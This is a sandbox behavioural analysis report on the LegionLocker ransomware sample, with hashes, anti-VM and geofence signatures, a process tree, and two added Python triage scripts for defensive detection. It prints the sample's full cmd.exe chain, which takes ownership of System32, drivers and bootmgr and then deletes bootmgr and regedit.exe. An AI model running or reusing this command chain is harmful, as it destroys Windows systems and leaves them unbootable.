Analysis

max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-11-2024 12:23
Behavioral task: behavioral1
Sample: Ransomware LegionLocker.exe
Resource: win7-20240708-en

(The signatures and process tree below reference behavioral2 memory dumps and the win10v2004 resource listed under Analysis.)
General

Target: Ransomware LegionLocker.exe
Size: 3.1MB
MD5: 6a85d0ba4d1db63d390b7a071d60e0ef
SHA1: 79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
SHA256: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
SHA512: 16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
SSDEEP: 49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config

Extracted
  Path (ransom note): C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\HOW-TO-DECRYPT.TXT
  URL: http://mail2tor2zyjdctd.onion/

The .onion address was extracted from the note text; it is a contact indicator, not evidence of a connection made during the run. The note was recovered from inside the Chrome profile directory, which is worth keeping in mind when reading the browser-data signature below.
Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)  (2 TTPs, 1 IoC)
  description   ioc                                           process
  Key opened    \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__   Ransomware LegionLocker.exe

Renames multiple (465) files with added filename extension
  Consistent with ransomware behaviour: files across the system are encrypted and an extension is appended to each.
Disables Task Manager via registry modification

Possible privilege escalation attempt  (5 IoCs)
  pid    process
  1748   takeown.exe
  4132   icacls.exe
  4864   takeown.exe
  704    icacls.exe
  3680   takeown.exe
  These are the takeown/icacls calls against C:\Windows\System32 shown in the process tree. The grants resolve to Admin:F and the takeown processes enable SeTakeOwnershipPrivilege, so the sample is already running with administrative rights; this is ownership and ACL tampering on system files rather than an elevation from a lower privilege level.
Checks BIOS information in registry  (2 TTPs, 2 IoCs)
  BIOS version strings are commonly read to detect sandbox or hypervisor environments.
  description         ioc                                                                process
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion   Ransomware LegionLocker.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion    Ransomware LegionLocker.exe

Checks computer location settings  (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for a geofence.
  description         ioc                                                                                                     process
  Key value queried   \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation   Ransomware LegionLocker.exe

Modifies file permissions  (1 TTP, 5 IoCs)
  pid    process
  704    icacls.exe
  3680   takeown.exe
  1748   takeown.exe
  4132   icacls.exe
  4864   takeown.exe
Reads user/profile data of web browsers  (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials. No IoC rows are listed for this signature; the ransom note above was dropped inside the Chrome profile directory, so the match may reflect the encryption walk rather than credential theft.

YARA matches (rule: themida)
  resource                                                                      yara_rule
  behavioral2/memory/3928-11-0x0000000000720000-0x0000000000F50000-memory.dmp   themida
  behavioral2/memory/3928-12-0x0000000000720000-0x0000000000F50000-memory.dmp   themida
  The main process (PID 3928) image region matches the Themida packer rule; static analysis of the on-disk binary will need an unpacked memory dump.

Checks whether UAC is enabled
  description         ioc                                                                                  process
  Key value queried   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   Ransomware LegionLocker.exe

Suspicious use of NtSetInformationThreadHideFromDebugger  (1 IoC)
  pid    process
  3928   Ransomware LegionLocker.exe
Enumerates physical storage devices  (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery  (1 TTP, 7 IoCs)
  Attempts to gather the system language of the victim host in order to infer its geographical location.
  description   ioc                                                       process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   takeown.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   icacls.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   takeown.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   icacls.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   takeown.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   Ransomware LegionLocker.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  The NLS\Language key is opened by every process in the tree, including the stock takeown.exe, icacls.exe and cmd.exe; for those it is routine locale initialisation, so only the main process's lookup is a meaningful indicator.

Suspicious use of AdjustPrivilegeToken  (5 IoCs)
  description                        pid    process
  Token: SeDebugPrivilege            3928   Ransomware LegionLocker.exe
  Token: SeDebugPrivilege            3928   Ransomware LegionLocker.exe
  Token: SeTakeOwnershipPrivilege    1748   takeown.exe
  Token: SeTakeOwnershipPrivilege    4864   takeown.exe
  Token: SeTakeOwnershipPrivilege    3680   takeown.exe

Suspicious use of WriteProcessMemory  (18 IoCs; each parent/child pair is recorded three times, giving six unique process creations)
  description                          process                       target process
  PID 3928 wrote to memory of 2344     Ransomware LegionLocker.exe   cmd.exe       (x3)
  PID 2344 wrote to memory of 1748     cmd.exe                       takeown.exe   (x3)
  PID 2344 wrote to memory of 4132     cmd.exe                       icacls.exe    (x3)
  PID 2344 wrote to memory of 4864     cmd.exe                       takeown.exe   (x3)
  PID 2344 wrote to memory of 704      cmd.exe                       icacls.exe    (x3)
  PID 2344 wrote to memory of 3680     cmd.exe                       takeown.exe   (x3)
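The WriteProcessMemory, AdjustPrivilegeToken and registry rows above are flat IoC lists; the process tree further down is what you get by joining them. The following Python is an added example, not part of the sandbox report or its tooling, that performs that join offline: it parses rows copied from this report, collapses the three repeated writes per parent/child pair into one edge, attaches enabled privileges by PID and the anti-analysis registry checks by image name (those rows carry no PID), and prints the tree. The row regexes, the EVASION_KEYS labels, the registry-row subset and the longest-suffix image-name split are this example's own assumptions about the row layout, not a documented sandbox schema.

```python
"""Rebuild the process tree from flattened sandbox IoC rows (added example,
not part of the report). Rows are copied from the signatures above; the
regexes, EVASION_KEYS labels and image-name heuristic are assumptions."""
import re
from collections import defaultdict

WRITE_ROWS = r"""PID 3928 wrote to memory of 2344 3928 Ransomware LegionLocker.exe cmd.exe
PID 3928 wrote to memory of 2344 3928 Ransomware LegionLocker.exe cmd.exe
PID 3928 wrote to memory of 2344 3928 Ransomware LegionLocker.exe cmd.exe
PID 2344 wrote to memory of 1748 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 1748 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 1748 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 4132 2344 cmd.exe icacls.exe
PID 2344 wrote to memory of 4132 2344 cmd.exe icacls.exe
PID 2344 wrote to memory of 4132 2344 cmd.exe icacls.exe
PID 2344 wrote to memory of 4864 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 4864 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 4864 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 704 2344 cmd.exe icacls.exe
PID 2344 wrote to memory of 704 2344 cmd.exe icacls.exe
PID 2344 wrote to memory of 704 2344 cmd.exe icacls.exe
PID 2344 wrote to memory of 3680 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 3680 2344 cmd.exe takeown.exe
PID 2344 wrote to memory of 3680 2344 cmd.exe takeown.exe"""
TOKEN_ROWS = r"""Token: SeDebugPrivilege 3928 Ransomware LegionLocker.exe
Token: SeDebugPrivilege 3928 Ransomware LegionLocker.exe
Token: SeTakeOwnershipPrivilege 1748 takeown.exe
Token: SeTakeOwnershipPrivilege 4864 takeown.exe
Token: SeTakeOwnershipPrivilege 3680 takeown.exe"""
# Representative subset of the registry IoC rows (no PID in these rows).
REGISTRY_ROWS = r"""Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Ransomware LegionLocker.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ransomware LegionLocker.exe
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Ransomware LegionLocker.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ransomware LegionLocker.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe"""

WRITE_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \1 (.+) (\S+\.exe)$")
TOKEN_RE = re.compile(r"^Token: (\S+) (\d+) (.+)$")
REG_RE = re.compile(r"^Key (?:opened|value queried) (.+)$")
EVASION_KEYS = {  # assumed labels for the registry paths the report flags
    r"\ACPI\DSDT\VBOX__": "VirtualBox ACPI table (anti-VM)",
    r"\System\SystemBiosVersion": "BIOS version (sandbox check)",
    r"\Geo\Nation": "country code (geofence)",
    r"\Policies\System\EnableLUA": "UAC enabled?",
    r"\NLS\Language": "system language",
}

def rows(text):
    return [ln for ln in text.splitlines() if ln.strip()]

def split_trailing_image(text, names):
    """Split 'path image.exe' when an image name may itself contain spaces:
    try every known image name as a suffix, longest first."""
    for name in sorted(names, key=len, reverse=True):
        if text.endswith(" " + name):
            return text[: -len(name) - 1], name
    raise ValueError(f"no known image name at end of {text!r}")

def build_tree(write_rows, token_rows, registry_rows):
    name, parent, children, edges = {}, {}, defaultdict(list), 0
    for row in rows(write_rows):
        m = WRITE_RE.match(row)
        if not m:
            continue
        src, dst = int(m.group(1)), int(m.group(2))
        name[src], name[dst] = m.group(3), m.group(4)
        if dst not in parent:  # the three writes per child are one creation
            parent[dst], edges = src, edges + 1
            children[src].append(dst)
    privs = defaultdict(set)
    for row in rows(token_rows):
        m = TOKEN_RE.match(row)
        if m:
            privs[int(m.group(2))].add(m.group(1))
    checks = defaultdict(list)  # keyed by image name: these rows carry no PID
    for row in rows(registry_rows):
        m = REG_RE.match(row)
        if not m:
            continue
        path, image = split_trailing_image(m.group(1), set(name.values()))
        checks[image].append(next((v for k, v in EVASION_KEYS.items()
                                   if path.endswith(k)), "other"))
    return {"name": name, "children": dict(children), "edges": edges,
            "privs": dict(privs), "checks": dict(checks),
            "roots": sorted(p for p in name if p not in parent)}

def render(tree, pid=None, depth=0):
    """Indented one-line-per-process view: pid image [privileges] {checks}."""
    out = []
    for p in (tree["roots"] if pid is None else tree["children"].get(pid, [])):
        img = tree["name"][p]
        privs = " ".join(sorted(tree["privs"].get(p, ())))
        checks = "; ".join(tree["checks"].get(img, ()))
        line = f"{'  ' * depth}{p} {img}"
        line += f" [{privs}]" if privs else ""
        line += f" {{{checks}}}" if checks else ""
        out.append(line)
        out.extend(render(tree, p, depth + 1))
    return out

if __name__ == "__main__":
    print("\n".join(render(build_tree(WRITE_ROWS, TOKEN_ROWS, REGISTRY_ROWS))))
```

Running it reproduces the seven-process tree shown under Processes, with SeDebugPrivilege and the five anti-analysis lookups pinned to PID 3928 and SeTakeOwnershipPrivilege on each takeown.exe. Because the registry rows only name the image, any check a stock binary performs (the NLS\Language open by cmd.exe here) is attributed to every process with that image name, which is why the tree is a triage aid and not a substitute for per-PID telemetry.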
Processes

C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe  (PID 3928)
  command line: "C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe  (PID 2344, child of 3928)
    command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\takeown.exe  (PID 1748, child of 2344)
      command line: takeown /f C:\Windows\System32
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\icacls.exe  (PID 4132, child of 2344)
      command line: icacls C:\Windows\System32 /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\takeown.exe  (PID 4864, child of 2344)
      command line: takeown /f C:\Windows\System32\drivers
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\icacls.exe  (PID 704, child of 2344)
      command line: icacls C:\Windows\System32\drivers /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\takeown.exe  (PID 3680, child of 2344)
      command line: takeown /f C:\Windows\System32\LogonUI.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

Reading the tree:
  - The sample is launched from the user's Temp directory and spawns a single cmd.exe /k chain that takes ownership of and grants full control over C:\Windows\System32, its drivers directory, LogonUI.exe, C:\bootmgr and regedit.exe, then deletes bootmgr (after stripping its system/read-only/hidden attributes) and regedit.exe. Deleting bootmgr leaves the machine unbootable after the encryption run.
  - Only the first five commands of the chain appear as child processes: the takeown/icacls steps on bootmgr and regedit.exe, the attrib/del of bootmgr and the del of regedit.exe are not recorded in this run, whether because the chain stopped or because the 150s window ended. Do not assume the later steps failed or succeeded from this report alone.
  - %username% in the parent command line expands to Admin in the children (the sandbox's account); a detection that matches the literal %username% in child command lines would miss these.
  - cmd.exe, takeown.exe and icacls.exe resolve to C:\Windows\SysWOW64 even though the command line names System32: the sample is a 32-bit binary on x64 (the arch:x86 tag above) and WOW64 file-system redirection applies.
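The cmd.exe line above is the whole takeover chain in one string, while the sandbox shows only five of its thirteen commands as child processes and shows %username% already expanded to Admin. The following Python is an added example, not the report's or any vendor's detection rule: it splits a /k or /c chain on &&, expands %VAR% references the way cmd.exe does, pulls the target path out of takeown, icacls, attrib and del, flags targets under a short PROTECTED prefix list, and matches the expanded commands against the recorded child command lines to show which steps the sandbox actually observed. PROTECTED, the severity labels and the per-verb argument rules (takeown /f <path>, icacls <path> ..., attrib [flags] <path>, del <path>) are this example's own assumptions.

```python
"""Flag takeown/icacls/attrib/del chains aimed at protected Windows paths.

Added example, not part of the report. The two inputs are copied from the
process tree above; PROTECTED, the severities and the per-verb argument rules
are this example's own assumptions, not a vendor detection rule.
"""
import re

# Constructed input: the parent cmd.exe command line exactly as recorded.
PARENT_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && '
    r'icacls C:\Windows\System32 /grant %username%:F && '
    r'takeown /f C:\Windows\System32\drivers && '
    r'icacls C:\Windows\System32\drivers /grant %username%:F && '
    r'takeown /f C:\Windows\System32\LogonUI.exe && '
    r'icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && '
    r'takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && '
    r'attrib -s -r -h C:\bootmgr && del C:\bootmgr && '
    r'takeown /f C:\Windows\regedit.exe && '
    r'icacls C:\Windows\regedit.exe /grant %username%:F && '
    r'del C:\Windows\regedit.exe && Exit'
)
# Constructed input: the five child command lines the sandbox recorded.
CHILD_CMDLINES = [
    r"takeown /f C:\Windows\System32",
    r"icacls C:\Windows\System32 /grant Admin:F",
    r"takeown /f C:\Windows\System32\drivers",
    r"icacls C:\Windows\System32\drivers /grant Admin:F",
    r"takeown /f C:\Windows\System32\LogonUI.exe",
]
# Assumed prefixes whose ownership, ACL or existence a user-launched cmd
# chain should never touch (compared case-insensitively).
PROTECTED = (r"c:\windows\system32", r"c:\windows\regedit.exe", r"c:\bootmgr")
SHELL_RE = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[kc]\s+(.*)$', re.I)


def split_chain(cmdline):
    """Commands cmd.exe would run, in order, from a '... /k <a> && <b>' line."""
    m = SHELL_RE.match(cmdline.strip())
    body = m.group(1) if m else cmdline
    return [p.strip() for p in body.split("&&") if p.strip()]


def expand_env(cmd, env):
    """Expand %VAR% like cmd.exe: case-insensitive, unknown names left as-is."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), cmd)


def target_of(tokens):
    """Path operated on by takeown / icacls / attrib / del, or None."""
    verb = tokens[0].lower()
    if verb == "takeown":
        flags = [t.lower() for t in tokens]
        return tokens[flags.index("/f") + 1] if "/f" in flags else None
    if verb in ("icacls", "del", "erase"):
        return tokens[1] if len(tokens) > 1 else None
    if verb == "attrib":
        paths = [t for t in tokens[1:] if t[0] not in "+-/"]
        return paths[-1] if paths else None
    return None


def is_protected(path):
    p = path.strip('"').lower()
    return any(p == pre or p.startswith(pre + "\\") for pre in PROTECTED)


def analyse_chain(cmdline, env):
    """One finding per command in the chain that touches a PROTECTED path."""
    findings = []
    for step, raw in enumerate(split_chain(cmdline), 1):
        cmd = expand_env(raw, env)
        tokens = cmd.split()
        verb, target = tokens[0].lower(), target_of(tokens)
        if not target or not is_protected(target):
            continue
        if verb in ("del", "erase"):
            sev = "critical" if target.lower() == r"c:\bootmgr" else "high"
            what = "deletes protected file"
        elif verb == "takeown":
            sev, what = "high", "takes ownership of protected path"
        elif verb == "icacls":
            granted = "/grant" in [t.lower() for t in tokens]
            sev = "high"
            what = "grants rights on protected path" if granted else "modifies ACL on protected path"
        else:
            sev, what = "medium", "changes attributes of protected path"
        findings.append({"step": step, "verb": verb, "target": target,
                         "severity": sev, "what": what, "expanded": cmd})
    return findings


def observed_steps(findings, child_cmdlines):
    """Steps whose expanded form matches a recorded child process command line."""
    seen = {c.strip().lower() for c in child_cmdlines}
    return [f["step"] for f in findings if f["expanded"].lower() in seen]


if __name__ == "__main__":
    found = analyse_chain(PARENT_CMDLINE, {"username": "Admin"})
    ran = set(observed_steps(found, CHILD_CMDLINES))
    for f in found:
        mark = "observed" if f["step"] in ran else "not observed"
        print(f"step {f['step']:2} {f['severity']:8} {f['what']}: {f['target']} [{mark}]")
```

Run against the report's data this yields thirteen findings (everything except the trailing Exit), one of them critical for del C:\bootmgr, with only steps 1 to 5 marked observed. Matching on the expanded form is what makes the child-process correlation work: the parent line carries %username% while the children carry Admin, and a rule keyed on the literal variable would correlate nothing.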
Network
MITRE ATT&CK Enterprise v15

Defense Evasion
  File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

Filesize: 1KB
MD5: f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1: 683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256: be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512: a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Filesize: 16B
MD5: 2caa6f3c95f6ec6bba5b54344938efa0
SHA1: 2d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA256: 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA512: 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00

Filesize: 332KB
MD5: 89b6590fcb9080db24875fa671b516ca
SHA1: 20e472ccdba84d504e087418e703073f44c4f2d9
SHA256: d883bdee08b17e451d3be046fd7cd7b9c816c37f72fa123ca1c13c81e9fcd5ac
SHA512: 3eea6d9796596d9d491b2fa1de794c33bda6447e11c611d769c32da6bd62f25d4b7b13748e70a601ae70f45eb36463d7080e16fcf80571e693109d9395345ee0

C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
Filesize: 8KB
MD5: 5090259c42fc6263bc00e952846280e8
SHA1: 9bf53e854027c9dec3b25ff1164e88872c71f66e
SHA256: a05288aa086504a20d2a3177854f8eb158778756ebc24dcfca266c52fa8d5a17
SHA512: 8b44fb8fade639c6b4d4b1f8747a8176652700a16b38e43f5f74403c2af0882fb6095986f8e4d94f3d5a242e8d49ed99a03361c01469c8c6a7bf7a7c3527ec7f